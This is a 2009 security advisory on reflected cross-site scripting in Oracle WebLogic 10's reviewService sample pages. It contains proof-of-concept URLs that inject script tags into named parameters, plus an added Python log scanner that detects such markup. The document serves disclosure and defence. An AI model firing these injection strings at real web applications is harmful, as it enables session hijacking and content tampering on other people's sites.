SECURITYVULNS:DOC:21154
Jan 16, 2009

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002

Application: Oracle BEA Weblogic 10
Versions Affected: Oracle BEA Weblogic 10
Vendor URL: http://oracle.com
Bugs: Multiple XSS Vulnerabilities in samples
Exploits: YES
Reported: 16.07.2008
Vendor response: 18.07.2008
Last response: 30.10.2008
Description: reviewService sample of WebLogic Server.
Date of Public Advisory: 13.01.2009
Authors: Alexandr Polyakov
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)

Description


Multiple XSS vulnerabilities were found in the samples of Oracle BEA Weblogic
Server version 10.2 and latest.

Details


The vulnerabilities were found in the reviewService sample of Weblogic Server.

  1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter "name"

Example:

http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>

  2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"

Example:

http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>

  3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example:

http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>

  4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example:

http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>

  5. There are also a couple of XSS vulnerabilities in POST parameters in these scripts:

http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp
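
Added example (not part of the DSecRG advisory and not Oracle code): a defender-side check that scans web access log lines for requests to the reviewService sample whose query parameters decode to HTML markup, as in the GET cases listed above. It goes beyond the listed parameters by checking every query parameter under /reviewService/; the Common Log Format layout, the addresses and the log lines themselves are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Characters a reflected value needs to break out into HTML markup.
MARKUP_RE = re.compile(r'[<>"]')
SAMPLE_PREFIX = "/reviewService/"  # sample application named in the advisory

# Constructed log lines (assumed format and addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2009:10:00:01 +0000] "GET /reviewService/'
    'createArtist_service.jsp?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.11 - - [16/Jan/2009:10:00:02 +0000] "GET /reviewService/'
    'addReview_session.jsp?comment=111&rating=%253Cb%253E HTTP/1.1" 200 498',
    '192.0.2.12 - - [16/Jan/2009:10:00:03 +0000] "GET /reviewService/'
    'addBooks_session_ejb21.jsp?name=111&title=Dune HTTP/1.1" 200 530',
    # POST bodies (item 5 of the advisory) never reach an access log.
    '192.0.2.13 - - [16/Jan/2009:10:00:04 +0000] "POST /reviewService/'
    'ClientServlet HTTP/1.1" 200 301',
]


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded input (%253C) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_requests(log_lines):
    """Return (page, parameter, decoded value) for suspicious sample requests."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if not target.path.startswith(SAMPLE_PREFIX):
            continue
        page = target.path[len(SAMPLE_PREFIX):]
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            decoded = fully_decode(value)
            if MARKUP_RE.search(decoded):
                hits.append((page, param, decoded))
    return hits
```

Any hit, or any request at all to /reviewService/ on a production listener, also shows that the sample application is deployed there.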

Fix Information


This is a Security-In-Depth vulnerability, because it was found in the samples
(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm).
Security-In-Depth issues are vulnerability issues that result in significant
modification of Oracle code or documentation in future releases, but are not of
such a critical nature that they are distributed in Critical Patch Updates.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

Credits


Oracle gives credit to Alexander Polyakov from Digital Security Company in the
Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

About


Digital Security is a leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and
database security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru